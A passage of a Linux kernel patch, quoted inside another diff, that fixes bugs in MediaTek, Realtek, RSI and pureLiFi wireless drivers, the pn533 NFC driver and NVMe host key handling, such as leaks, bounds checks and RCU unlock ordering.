++++ b/drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.c
+@@ -2834,6 +2834,9 @@ mt76_connac_mcu_send_ram_firmware(struct mt76_dev *dev,
+ 		len = le32_to_cpu(region->len);
+ 		addr = le32_to_cpu(region->addr);
+ 
++		if (region->feature_set & FW_FEATURE_NON_DL)
++			goto next;
++
+ 		if (region->feature_set & FW_FEATURE_OVERRIDE_ADDR)
+ 			override = addr;
+ 
+@@ -2850,6 +2853,7 @@ mt76_connac_mcu_send_ram_firmware(struct mt76_dev *dev,
+ 			return err;
+ 		}
+ 
++next:
+ 		offset += len;
+ 	}
+ 
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/eeprom.c b/drivers/net/wireless/mediatek/mt76/mt7915/eeprom.c
+index 4b1a9811646fd..0bce0ce51be00 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/eeprom.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/eeprom.c
+@@ -173,60 +173,50 @@ static void mt7915_eeprom_parse_band_config(struct mt7915_phy *phy)
+ void mt7915_eeprom_parse_hw_cap(struct mt7915_dev *dev,
+ 				struct mt7915_phy *phy)
+ {
+-	u8 nss, nss_band, nss_band_max, *eeprom = dev->mt76.eeprom.data;
++	u8 path, nss, nss_max = 4, *eeprom = dev->mt76.eeprom.data;
+ 	struct mt76_phy *mphy = phy->mt76;
+-	bool ext_phy = phy != &dev->phy;
+ 
+ 	mt7915_eeprom_parse_band_config(phy);
+ 
+-	/* read tx/rx mask from eeprom */
++	/* read tx/rx path from eeprom */
+ 	if (is_mt7915(&dev->mt76)) {
+-		nss = FIELD_GET(MT_EE_WIFI_CONF0_TX_PATH,
+-				eeprom[MT_EE_WIFI_CONF]);
++		path = FIELD_GET(MT_EE_WIFI_CONF0_TX_PATH,
++				 eeprom[MT_EE_WIFI_CONF]);
+ 	} else {
+-		nss = FIELD_GET(MT_EE_WIFI_CONF0_TX_PATH,
+-				eeprom[MT_EE_WIFI_CONF + phy->band_idx]);
++		path = FIELD_GET(MT_EE_WIFI_CONF0_TX_PATH,
++				 eeprom[MT_EE_WIFI_CONF + phy->band_idx]);
+ 	}
+ 
+-	if (!nss || nss > 4)
+-		nss = 4;
++	if (!path || path > 4)
++		path = 4;
+ 
+ 	/* read tx/rx stream */
+-	nss_band = nss;
+-
++	nss = path;
+ 	if (dev->dbdc_support) {
+ 		if (is_mt7915(&dev->mt76)) {
+-			nss_band = FIELD_GET(MT_EE_WIFI_CONF3_TX_PATH_B0,
+-					     eeprom[MT_EE_WIFI_CONF + 3]);
++			path = min_t(u8, path, 2);
++			nss = FIELD_GET(MT_EE_WIFI_CONF3_TX_PATH_B0,
++					eeprom[MT_EE_WIFI_CONF + 3]);
+ 			if (phy->band_idx)
+-				nss_band = FIELD_GET(MT_EE_WIFI_CONF3_TX_PATH_B1,
+-						     eeprom[MT_EE_WIFI_CONF + 3]);
++				nss = FIELD_GET(MT_EE_WIFI_CONF3_TX_PATH_B1,
++						eeprom[MT_EE_WIFI_CONF + 3]);
+ 		} else {
+-			nss_band = FIELD_GET(MT_EE_WIFI_CONF_STREAM_NUM,
+-					     eeprom[MT_EE_WIFI_CONF + 2 + phy->band_idx]);
++			nss = FIELD_GET(MT_EE_WIFI_CONF_STREAM_NUM,
++					eeprom[MT_EE_WIFI_CONF + 2 + phy->band_idx]);
+ 		}
+ 
+-		nss_band_max = is_mt7986(&dev->mt76) ?
+-			       MT_EE_NSS_MAX_DBDC_MA7986 : MT_EE_NSS_MAX_DBDC_MA7915;
+-	} else {
+-		nss_band_max = is_mt7986(&dev->mt76) ?
+-			       MT_EE_NSS_MAX_MA7986 : MT_EE_NSS_MAX_MA7915;
++		if (!is_mt7986(&dev->mt76))
++			nss_max = 2;
+ 	}
+ 
+-	if (!nss_band || nss_band > nss_band_max)
+-		nss_band = nss_band_max;
+-
+-	if (nss_band > nss) {
+-		dev_warn(dev->mt76.dev,
+-			 "nss mismatch, nss(%d) nss_band(%d) band(%d) ext_phy(%d)\n",
+-			 nss, nss_band, phy->band_idx, ext_phy);
+-		nss = nss_band;
+-	}
++	if (!nss)
++		nss = nss_max;
++	nss = min_t(u8, min_t(u8, nss_max, nss), path);
+ 
+-	mphy->chainmask = BIT(nss) - 1;
+-	if (ext_phy)
++	mphy->chainmask = BIT(path) - 1;
++	if (phy->band_idx)
+ 		mphy->chainmask <<= dev->chainshift;
+-	mphy->antenna_mask = BIT(nss_band) - 1;
++	mphy->antenna_mask = BIT(nss) - 1;
+ 	dev->chainmask |= mphy->chainmask;
+ 	dev->chainshift = hweight8(dev->mphy.chainmask);
+ }
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/eeprom.h b/drivers/net/wireless/mediatek/mt76/mt7915/eeprom.h
+index 7578ac6d0be62..f3e56817d36e9 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/eeprom.h
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/eeprom.h
+@@ -58,11 +58,6 @@ enum mt7915_eeprom_field {
+ #define MT_EE_RATE_DELTA_SIGN			BIT(6)
+ #define MT_EE_RATE_DELTA_EN			BIT(7)
+ 
+-#define MT_EE_NSS_MAX_MA7915			4
+-#define MT_EE_NSS_MAX_DBDC_MA7915		2
+-#define MT_EE_NSS_MAX_MA7986			4
+-#define MT_EE_NSS_MAX_DBDC_MA7986		4
+-
+ enum mt7915_adie_sku {
+ 	MT7976_ONE_ADIE_DBDC = 0x7,
+ 	MT7975_ONE_ADIE	= 0x8,
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/mac.c b/drivers/net/wireless/mediatek/mt76/mt7915/mac.c
+index a4bcc617c1a34..e6bf6e04d4b9c 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/mac.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/mac.c
+@@ -1151,7 +1151,7 @@ void mt7915_mac_set_timing(struct mt7915_phy *phy)
+ 		  FIELD_PREP(MT_TIMEOUT_VAL_CCA, 48);
+ 	u32 ofdm = FIELD_PREP(MT_TIMEOUT_VAL_PLCP, 60) |
+ 		   FIELD_PREP(MT_TIMEOUT_VAL_CCA, 28);
+-	int offset;
++	int eifs_ofdm = 360, sifs = 10, offset;
+ 	bool a_band = !(phy->mt76->chandef.chan->band == NL80211_BAND_2GHZ);
+ 
+ 	if (!test_bit(MT76_STATE_RUNNING, &phy->mt76->state))
+@@ -1169,17 +1169,26 @@ void mt7915_mac_set_timing(struct mt7915_phy *phy)
+ 	reg_offset = FIELD_PREP(MT_TIMEOUT_VAL_PLCP, offset) |
+ 		     FIELD_PREP(MT_TIMEOUT_VAL_CCA, offset);
+ 
++	if (!is_mt7915(&dev->mt76)) {
++		if (!a_band) {
++			mt76_wr(dev, MT_TMAC_ICR1(phy->band_idx),
++				FIELD_PREP(MT_IFS_EIFS_CCK, 314));
++			eifs_ofdm = 78;
++		} else {
++			eifs_ofdm = 84;
++		}
++	} else if (a_band) {
++		sifs = 16;
++	}
++
+ 	mt76_wr(dev, MT_TMAC_CDTR(phy->band_idx), cck + reg_offset);
+ 	mt76_wr(dev, MT_TMAC_ODTR(phy->band_idx), ofdm + reg_offset);
+ 	mt76_wr(dev, MT_TMAC_ICR0(phy->band_idx),
+-		FIELD_PREP(MT_IFS_EIFS_OFDM, a_band ? 84 : 78) |
++		FIELD_PREP(MT_IFS_EIFS_OFDM, eifs_ofdm) |
+ 		FIELD_PREP(MT_IFS_RIFS, 2) |
+-		FIELD_PREP(MT_IFS_SIFS, 10) |
++		FIELD_PREP(MT_IFS_SIFS, sifs) |
+ 		FIELD_PREP(MT_IFS_SLOT, phy->slottime));
+ 
+-	mt76_wr(dev, MT_TMAC_ICR1(phy->band_idx),
+-		FIELD_PREP(MT_IFS_EIFS_CCK, 314));
+-
+ 	if (phy->slottime < 20 || a_band)
+ 		val = MT7915_CFEND_RATE_DEFAULT;
+ 	else
+@@ -1600,7 +1609,7 @@ void mt7915_mac_update_stats(struct mt7915_phy *phy)
+ 
+ 	aggr0 = phy->band_idx ? ARRAY_SIZE(dev->mt76.aggr_stats) / 2 : 0;
+ 	if (is_mt7915(&dev->mt76)) {
+-		for (i = 0, aggr1 = aggr0 + 4; i < 4; i++) {
++		for (i = 0, aggr1 = aggr0 + 8; i < 4; i++) {
+ 			val = mt76_rr(dev, MT_MIB_MB_SDR1(phy->band_idx, (i << 4)));
+ 			mib->ba_miss_cnt +=
+ 				FIELD_GET(MT_MIB_BA_MISS_COUNT_MASK, val);
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/pci.c b/drivers/net/wireless/mediatek/mt76/mt7915/pci.c
+index 728a879c3b008..3808ce1647d9e 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/pci.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/pci.c
+@@ -65,10 +65,17 @@ static void mt7915_put_hif2(struct mt7915_hif *hif)
+ 
+ static struct mt7915_hif *mt7915_pci_init_hif2(struct pci_dev *pdev)
+ {
++	struct pci_dev *tmp_pdev;
++
+ 	hif_idx++;
+-	if (!pci_get_device(PCI_VENDOR_ID_MEDIATEK, 0x7916, NULL) &&
+-	    !pci_get_device(PCI_VENDOR_ID_MEDIATEK, 0x790a, NULL))
+-		return NULL;
++
++	tmp_pdev = pci_get_device(PCI_VENDOR_ID_MEDIATEK, 0x7916, NULL);
++	if (!tmp_pdev) {
++		tmp_pdev = pci_get_device(PCI_VENDOR_ID_MEDIATEK, 0x790a, NULL);
++		if (!tmp_pdev)
++			return NULL;
++	}
++	pci_dev_put(tmp_pdev);
+ 
+ 	writel(hif_idx | MT_PCIE_RECOG_ID_SEM,
+ 	       pcim_iomap_table(pdev)[0] + MT_PCIE_RECOG_ID);
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/init.c b/drivers/net/wireless/mediatek/mt76/mt7921/init.c
+index dcdb3cf04ac1b..4ad66b3443838 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/init.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/init.c
+@@ -37,6 +37,7 @@ mt7921_regd_notifier(struct wiphy *wiphy,
+ 
+ 	memcpy(dev->mt76.alpha2, request->alpha2, sizeof(dev->mt76.alpha2));
+ 	dev->mt76.region = request->dfs_region;
++	dev->country_ie_env = request->country_ie_env;
+ 
+ 	mt7921_mutex_acquire(dev);
+ 	mt7921_mcu_set_clc(dev, request->alpha2, request->country_ie_env);
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/mac.c b/drivers/net/wireless/mediatek/mt76/mt7921/mac.c
+index 650ab97ae0524..1c0d8cf19b8eb 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/mac.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/mac.c
+@@ -396,6 +396,27 @@ mt7921_mac_fill_rx(struct mt7921_dev *dev, struct sk_buff *skb)
+ 		if (v0 & MT_PRXV_HT_AD_CODE)
+ 			status->enc_flags |= RX_ENC_FLAG_LDPC;
+ 
++		ret = mt76_connac2_mac_fill_rx_rate(&dev->mt76, status, sband,
++						    rxv, &mode);
++		if (ret < 0)
++			return ret;
++
++		if (rxd1 & MT_RXD1_NORMAL_GROUP_5) {
++			rxd += 6;
++			if ((u8 *)rxd - skb->data >= skb->len)
++				return -EINVAL;
++
++			rxv = rxd;
++			/* Monitor mode would use RCPI described in GROUP 5
++			 * instead.
++			 */
++			v1 = le32_to_cpu(rxv[0]);
++
++			rxd += 12;
++			if ((u8 *)rxd - skb->data >= skb->len)
++				return -EINVAL;
++		}
++
+ 		status->chains = mphy->antenna_mask;
+ 		status->chain_signal[0] = to_rssi(MT_PRXV_RCPI0, v1);
+ 		status->chain_signal[1] = to_rssi(MT_PRXV_RCPI1, v1);
+@@ -410,17 +431,6 @@ mt7921_mac_fill_rx(struct mt7921_dev *dev, struct sk_buff *skb)
+ 			status->signal = max(status->signal,
+ 					     status->chain_signal[i]);
+ 		}
+-
+-		ret = mt76_connac2_mac_fill_rx_rate(&dev->mt76, status, sband,
+-						    rxv, &mode);
+-		if (ret < 0)
+-			return ret;
+-
+-		if (rxd1 & MT_RXD1_NORMAL_GROUP_5) {
+-			rxd += 18;
+-			if ((u8 *)rxd - skb->data >= skb->len)
+-				return -EINVAL;
+-		}
+ 	}
+ 
+ 	amsdu_info = FIELD_GET(MT_RXD4_NORMAL_PAYLOAD_FORMAT, rxd4);
+@@ -974,7 +984,7 @@ void mt7921_mac_update_mib_stats(struct mt7921_phy *phy)
+ 		mib->tx_amsdu_cnt += val;
+ 	}
+ 
+-	for (i = 0, aggr1 = aggr0 + 4; i < 4; i++) {
++	for (i = 0, aggr1 = aggr0 + 8; i < 4; i++) {
+ 		u32 val2;
+ 
+ 		val = mt76_rr(dev, MT_TX_AGG_CNT(0, i));
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/main.c b/drivers/net/wireless/mediatek/mt76/mt7921/main.c
+index 7e409ac7d9a82..111d9221b94f5 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/main.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/main.c
+@@ -1504,7 +1504,13 @@ static int mt7921_set_sar_specs(struct ieee80211_hw *hw,
+ 	int err;
+ 
+ 	mt7921_mutex_acquire(dev);
++	err = mt7921_mcu_set_clc(dev, dev->mt76.alpha2,
++				 dev->country_ie_env);
++	if (err < 0)
++		goto out;
++
+ 	err = mt7921_set_tx_sar_pwr(hw, sar);
++out:
+ 	mt7921_mutex_release(dev);
+ 
+ 	return err;
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/mt7921.h b/drivers/net/wireless/mediatek/mt76/mt7921/mt7921.h
+index eaba114a9c7e4..d36b940c0a07a 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/mt7921.h
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/mt7921.h
+@@ -171,7 +171,7 @@ struct mt7921_clc {
+ 	u8 type;
+ 	u8 rsv[8];
+ 	u8 data[];
+-};
++} __packed;
+ 
+ struct mt7921_phy {
+ 	struct mt76_phy *mt76;
+@@ -244,6 +244,8 @@ struct mt7921_dev {
+ 	struct work_struct ipv6_ns_work;
+ 	/* IPv6 addresses for WoWLAN */
+ 	struct sk_buff_head ipv6_ns_list;
++
++	enum environment_cap country_ie_env;
+ };
+ 
+ enum {
+diff --git a/drivers/net/wireless/mediatek/mt76/usb.c b/drivers/net/wireless/mediatek/mt76/usb.c
+index 4c4033bb1bb35..0597df2729a62 100644
+--- a/drivers/net/wireless/mediatek/mt76/usb.c
++++ b/drivers/net/wireless/mediatek/mt76/usb.c
+@@ -766,6 +766,9 @@ static void mt76u_status_worker(struct mt76_worker *w)
+ 	struct mt76_queue *q;
+ 	int i;
+ 
++	if (!test_bit(MT76_STATE_RUNNING, &dev->phy.state))
++		return;
++
+ 	for (i = 0; i < IEEE80211_NUM_ACS; i++) {
+ 		q = dev->phy.q_tx[i];
+ 		if (!q)
+@@ -785,11 +788,11 @@ static void mt76u_status_worker(struct mt76_worker *w)
+ 			wake_up(&dev->tx_wait);
+ 
+ 		mt76_worker_schedule(&dev->tx_worker);
+-
+-		if (dev->drv->tx_status_data &&
+-		    !test_and_set_bit(MT76_READING_STATS, &dev->phy.state))
+-			queue_work(dev->wq, &dev->usb.stat_work);
+ 	}
++
++	if (dev->drv->tx_status_data &&
++	    !test_and_set_bit(MT76_READING_STATS, &dev->phy.state))
++		queue_work(dev->wq, &dev->usb.stat_work);
+ }
+ 
+ static void mt76u_tx_status_data(struct work_struct *work)
+diff --git a/drivers/net/wireless/purelifi/plfxlc/usb.c b/drivers/net/wireless/purelifi/plfxlc/usb.c
+index 39e54b3787d6a..76d0a778636a4 100644
+--- a/drivers/net/wireless/purelifi/plfxlc/usb.c
++++ b/drivers/net/wireless/purelifi/plfxlc/usb.c
+@@ -247,6 +247,7 @@ error:
+ 		for (i = 0; i < RX_URBS_COUNT; i++)
+ 			free_rx_urb(urbs[i]);
+ 	}
++	kfree(urbs);
+ 	return r;
+ }
+ 
+diff --git a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu.h b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu.h
+index 782b089a2e1ba..1ba66b8f70c95 100644
+--- a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu.h
++++ b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu.h
+@@ -1190,7 +1190,7 @@ struct rtl8723bu_c2h {
+ 			u8 bw;
+ 		} __packed ra_report;
+ 	};
+-};
++} __packed;
+ 
+ struct rtl8xxxu_fileops;
+ 
+diff --git a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c
+index ac641a56efb09..e9c1b62c9c3c2 100644
+--- a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c
++++ b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c
+@@ -1608,18 +1608,18 @@ static int rtl8xxxu_identify_chip(struct rtl8xxxu_priv *priv)
+ {
+ 	struct device *dev = &priv->udev->dev;
+ 	struct ieee80211_hw *hw = priv->hw;
+-	u32 val32, bonding;
++	u32 val32, bonding, sys_cfg;
+ 	u16 val16;
+ 
+-	val32 = rtl8xxxu_read32(priv, REG_SYS_CFG);
+-	priv->chip_cut = (val32 & SYS_CFG_CHIP_VERSION_MASK) >>
++	sys_cfg = rtl8xxxu_read32(priv, REG_SYS_CFG);
++	priv->chip_cut = (sys_cfg & SYS_CFG_CHIP_VERSION_MASK) >>
+ 		SYS_CFG_CHIP_VERSION_SHIFT;
+-	if (val32 & SYS_CFG_TRP_VAUX_EN) {
++	if (sys_cfg & SYS_CFG_TRP_VAUX_EN) {
+ 		dev_info(dev, "Unsupported test chip\n");
+ 		return -ENOTSUPP;
+ 	}
+ 
+-	if (val32 & SYS_CFG_BT_FUNC) {
++	if (sys_cfg & SYS_CFG_BT_FUNC) {
+ 		if (priv->chip_cut >= 3) {
+ 			sprintf(priv->chip_name, "8723BU");
+ 			priv->rtl_chip = RTL8723B;
+@@ -1641,7 +1641,7 @@ static int rtl8xxxu_identify_chip(struct rtl8xxxu_priv *priv)
+ 		if (val32 & MULTI_GPS_FUNC_EN)
+ 			priv->has_gps = 1;
+ 		priv->is_multi_func = 1;
+-	} else if (val32 & SYS_CFG_TYPE_ID) {
++	} else if (sys_cfg & SYS_CFG_TYPE_ID) {
+ 		bonding = rtl8xxxu_read32(priv, REG_HPON_FSM);
+ 		bonding &= HPON_FSM_BONDING_MASK;
+ 		if (priv->fops->tx_desc_size ==
+@@ -1692,7 +1692,7 @@ static int rtl8xxxu_identify_chip(struct rtl8xxxu_priv *priv)
+ 	case RTL8188E:
+ 	case RTL8192E:
+ 	case RTL8723B:
+-		switch (val32 & SYS_CFG_VENDOR_EXT_MASK) {
++		switch (sys_cfg & SYS_CFG_VENDOR_EXT_MASK) {
+ 		case SYS_CFG_VENDOR_ID_TSMC:
+ 			sprintf(priv->chip_vendor, "TSMC");
+ 			break;
+@@ -1709,7 +1709,7 @@ static int rtl8xxxu_identify_chip(struct rtl8xxxu_priv *priv)
+ 		}
+ 		break;
+ 	default:
+-		if (val32 & SYS_CFG_VENDOR_ID) {
++		if (sys_cfg & SYS_CFG_VENDOR_ID) {
+ 			sprintf(priv->chip_vendor, "UMC");
+ 			priv->vendor_umc = 1;
+ 		} else {
+@@ -4654,7 +4654,6 @@ rtl8xxxu_bss_info_changed(struct ieee80211_hw *hw, struct ieee80211_vif *vif,
+ 			if (sta->deflink.ht_cap.cap &
+ 			    (IEEE80211_HT_CAP_SGI_40 | IEEE80211_HT_CAP_SGI_20))
+ 				sgi = 1;
+-			rcu_read_unlock();
+ 
+ 			highest_rate = fls(ramask) - 1;
+ 			if (highest_rate < DESC_RATE_MCS0) {
+@@ -4679,6 +4678,7 @@ rtl8xxxu_bss_info_changed(struct ieee80211_hw *hw, struct ieee80211_vif *vif,
+ 				else
+ 					rarpt->txrate.bw = RATE_INFO_BW_20;
+ 			}
++			rcu_read_unlock();
+ 			bit_rate = cfg80211_calculate_bitrate(&rarpt->txrate);
+ 			rarpt->bit_rate = bit_rate;
+ 			rarpt->desc_rate = highest_rate;
+@@ -5574,7 +5574,6 @@ static void rtl8xxxu_c2hcmd_callback(struct work_struct *work)
+ 			rarpt->txrate.flags = 0;
+ 			rate = c2h->ra_report.rate;
+ 			sgi = c2h->ra_report.sgi;
+-			bw = c2h->ra_report.bw;
+ 
+ 			if (rate < DESC_RATE_MCS0) {
+ 				rarpt->txrate.legacy =
+@@ -5591,8 +5590,13 @@ static void rtl8xxxu_c2hcmd_callback(struct work_struct *work)
+ 						RATE_INFO_FLAGS_SHORT_GI;
+ 				}
+ 
+-				if (bw == RATE_INFO_BW_20)
+-					rarpt->txrate.bw |= RATE_INFO_BW_20;
++				if (skb->len >= offsetofend(typeof(*c2h), ra_report.bw)) {
++					if (c2h->ra_report.bw == RTL8XXXU_CHANNEL_WIDTH_40)
++						bw = RATE_INFO_BW_40;
++					else
++						bw = RATE_INFO_BW_20;
++					rarpt->txrate.bw = bw;
++				}
+ 			}
+ 			bit_rate = cfg80211_calculate_bitrate(&rarpt->txrate);
+ 			rarpt->bit_rate = bit_rate;
+diff --git a/drivers/net/wireless/realtek/rtw89/core.c b/drivers/net/wireless/realtek/rtw89/core.c
+index bc2994865372b..ad420d7ec8af9 100644
+--- a/drivers/net/wireless/realtek/rtw89/core.c
++++ b/drivers/net/wireless/realtek/rtw89/core.c
+@@ -2527,7 +2527,7 @@ int rtw89_core_sta_assoc(struct rtw89_dev *rtwdev,
+ 	}
+ 
+ 	/* update cam aid mac_id net_type */
+-	rtw89_fw_h2c_cam(rtwdev, rtwvif, rtwsta, NULL);
++	ret = rtw89_fw_h2c_cam(rtwdev, rtwvif, rtwsta, NULL);
+ 	if (ret) {
+ 		rtw89_warn(rtwdev, "failed to send h2c cam\n");
+ 		return ret;
+diff --git a/drivers/net/wireless/realtek/rtw89/mac.c b/drivers/net/wireless/realtek/rtw89/mac.c
+index 0508dfca8edf7..077fddc5fa1ea 100644
+--- a/drivers/net/wireless/realtek/rtw89/mac.c
++++ b/drivers/net/wireless/realtek/rtw89/mac.c
+@@ -1429,10 +1429,8 @@ static int dle_mix_cfg(struct rtw89_dev *rtwdev, const struct rtw89_dle_mem *cfg
+ #define INVALID_QT_WCPU U16_MAX
+ #define SET_QUOTA_VAL(_min_x, _max_x, _module, _idx)			\
+ 	do {								\
+-		val = ((_min_x) &					\
+-		       B_AX_ ## _module ## _MIN_SIZE_MASK) |		\
+-		      (((_max_x) << 16) &				\
+-		       B_AX_ ## _module ## _MAX_SIZE_MASK);		\
++		val = u32_encode_bits(_min_x, B_AX_ ## _module ## _MIN_SIZE_MASK) | \
++		      u32_encode_bits(_max_x, B_AX_ ## _module ## _MAX_SIZE_MASK);  \
+ 		rtw89_write32(rtwdev,					\
+ 			      R_AX_ ## _module ## _QTA ## _idx ## _CFG,	\
+ 			      val);					\
+diff --git a/drivers/net/wireless/realtek/rtw89/phy.c b/drivers/net/wireless/realtek/rtw89/phy.c
+index 6a6bdc652e09e..c894a2b614eb1 100644
+--- a/drivers/net/wireless/realtek/rtw89/phy.c
++++ b/drivers/net/wireless/realtek/rtw89/phy.c
+@@ -3139,7 +3139,7 @@ void rtw89_phy_env_monitor_track(struct rtw89_dev *rtwdev)
+ 
+ static bool rtw89_physts_ie_page_valid(enum rtw89_phy_status_bitmap *ie_page)
+ {
+-	if (*ie_page > RTW89_PHYSTS_BITMAP_NUM ||
++	if (*ie_page >= RTW89_PHYSTS_BITMAP_NUM ||
+ 	    *ie_page == RTW89_RSVD_9)
+ 		return false;
+ 	else if (*ie_page > RTW89_RSVD_9)
+diff --git a/drivers/net/wireless/rsi/rsi_91x_core.c b/drivers/net/wireless/rsi/rsi_91x_core.c
+index 0f3a80f66b61c..ead4d4e043280 100644
+--- a/drivers/net/wireless/rsi/rsi_91x_core.c
++++ b/drivers/net/wireless/rsi/rsi_91x_core.c
+@@ -466,7 +466,9 @@ void rsi_core_xmit(struct rsi_common *common, struct sk_buff *skb)
+ 							      tid, 0);
+ 			}
+ 		}
+-		if (skb->protocol == cpu_to_be16(ETH_P_PAE)) {
++
++		if (IEEE80211_SKB_CB(skb)->control.flags &
++		    IEEE80211_TX_CTRL_PORT_CTRL_PROTO) {
+ 			q_num = MGMT_SOFT_Q;
+ 			skb->priority = q_num;
+ 		}
+diff --git a/drivers/net/wireless/rsi/rsi_91x_hal.c b/drivers/net/wireless/rsi/rsi_91x_hal.c
+index c61f83a7333b6..c7460fbba0142 100644
+--- a/drivers/net/wireless/rsi/rsi_91x_hal.c
++++ b/drivers/net/wireless/rsi/rsi_91x_hal.c
+@@ -162,12 +162,16 @@ int rsi_prepare_data_desc(struct rsi_common *common, struct sk_buff *skb)
+ 	u8 header_size;
+ 	u8 vap_id = 0;
+ 	u8 dword_align_bytes;
++	bool tx_eapol;
+ 	u16 seq_num;
+ 
+ 	info = IEEE80211_SKB_CB(skb);
+ 	vif = info->control.vif;
+ 	tx_params = (struct skb_info *)info->driver_data;
+ 
++	tx_eapol = IEEE80211_SKB_CB(skb)->control.flags &
++		   IEEE80211_TX_CTRL_PORT_CTRL_PROTO;
++
+ 	header_size = FRAME_DESC_SZ + sizeof(struct rsi_xtended_desc);
+ 	if (header_size > skb_headroom(skb)) {
+ 		rsi_dbg(ERR_ZONE, "%s: Unable to send pkt\n", __func__);
+@@ -231,7 +235,7 @@ int rsi_prepare_data_desc(struct rsi_common *common, struct sk_buff *skb)
+ 		}
+ 	}
+ 
+-	if (skb->protocol == cpu_to_be16(ETH_P_PAE)) {
++	if (tx_eapol) {
+ 		rsi_dbg(INFO_ZONE, "*** Tx EAPOL ***\n");
+ 
+ 		data_desc->frame_info = cpu_to_le16(RATE_INFO_ENABLE);
+diff --git a/drivers/nfc/pn533/pn533.c b/drivers/nfc/pn533/pn533.c
+index d9f6367b9993d..f0cac19005527 100644
+--- a/drivers/nfc/pn533/pn533.c
++++ b/drivers/nfc/pn533/pn533.c
+@@ -1295,6 +1295,8 @@ static int pn533_poll_dep_complete(struct pn533 *dev, void *arg,
+ 	if (IS_ERR(resp))
+ 		return PTR_ERR(resp);
+ 
++	memset(&nfc_target, 0, sizeof(struct nfc_target));
++
+ 	rsp = (struct pn533_cmd_jump_dep_response *)resp->data;
+ 
+ 	rc = rsp->status & PN533_CMD_RET_MASK;
+@@ -1926,6 +1928,8 @@ static int pn533_in_dep_link_up_complete(struct pn533 *dev, void *arg,
+ 
+ 		dev_dbg(dev->dev, "Creating new target\n");
+ 
++		memset(&nfc_target, 0, sizeof(struct nfc_target));
++
+ 		nfc_target.supported_protocols = NFC_PROTO_NFC_DEP_MASK;
+ 		nfc_target.nfcid1_len = 10;
+ 		memcpy(nfc_target.nfcid1, rsp->nfcid3t, nfc_target.nfcid1_len);
+diff --git a/drivers/nvme/host/core.c b/drivers/nvme/host/core.c
+index 7e3893d06babd..108b5022ceadc 100644
+--- a/drivers/nvme/host/core.c
++++ b/drivers/nvme/host/core.c
+@@ -3049,7 +3049,7 @@ static int nvme_init_non_mdts_limits(struct nvme_ctrl *ctrl)
+ 
+ 	id = kzalloc(sizeof(*id), GFP_KERNEL);
+ 	if (!id)
+-		return 0;
++		return -ENOMEM;
+ 
+ 	c.identify.opcode = nvme_admin_identify;
+ 	c.identify.cns = NVME_ID_CNS_CS_CTRL;
+@@ -3745,13 +3745,17 @@ static ssize_t nvme_ctrl_dhchap_secret_store(struct device *dev,
+ 	memcpy(dhchap_secret, buf, count);
+ 	nvme_auth_stop(ctrl);
+ 	if (strcmp(dhchap_secret, opts->dhchap_secret)) {
++		struct nvme_dhchap_key *key, *host_key;
+ 		int ret;
+ 
+-		ret = nvme_auth_generate_key(dhchap_secret, &ctrl->host_key);
++		ret = nvme_auth_generate_key(dhchap_secret, &key);
+ 		if (ret)
+ 			return ret;
+ 		kfree(opts->dhchap_secret);
+ 		opts->dhchap_secret = dhchap_secret;
++		host_key = ctrl->host_key;
++		ctrl->host_key = key;
++		nvme_auth_free_key(host_key);
+ 		/* Key has changed; re-authentication with new key */
+ 		nvme_auth_reset(ctrl);
+ 	}
+@@ -3795,13 +3799,17 @@ static ssize_t nvme_ctrl_dhchap_ctrl_secret_store(struct device *dev,
+ 	memcpy(dhchap_secret, buf, count);
+ 	nvme_auth_stop(ctrl);
+ 	if (strcmp(dhchap_secret, opts->dhchap_ctrl_secret)) {
++		struct nvme_dhchap_key *key, *ctrl_key;
+ 		int ret;
+ 
+-		ret = nvme_auth_generate_key(dhchap_secret, &ctrl->ctrl_key);
++		ret = nvme_auth_generate_key(dhchap_secret, &key);
+ 		if (ret)
+ 			return ret;
+ 		kfree(opts->dhchap_ctrl_secret);
+ 		opts->dhchap_ctrl_secret = dhchap_secret;
++		ctrl_key = ctrl->ctrl_key;
++		ctrl->ctrl_key = key;
++		nvme_auth_free_key(ctrl_key);
+ 		/* Key has changed; re-authentication with new key */
+ 		nvme_auth_reset(ctrl);
+ 	}
+@@ -4867,7 +4875,7 @@ EXPORT_SYMBOL_GPL(nvme_remove_admin_tag_set);
+ 
+ int nvme_alloc_io_tag_set(struct nvme_ctrl *ctrl, struct blk_mq_tag_set *set,
+ 		const struct blk_mq_ops *ops, unsigned int flags,
+-		unsigned int cmd_size)
++		unsigned int nr_maps, unsigned int cmd_size)
+ {
+ 	int ret;
+ 
+@@ -4881,8 +4889,7 @@ int nvme_alloc_io_tag_set(struct nvme_ctrl *ctrl, struct blk_mq_tag_set *set,
+ 	set->driver_data = ctrl;
+ 	set->nr_hw_queues = ctrl->queue_count - 1;
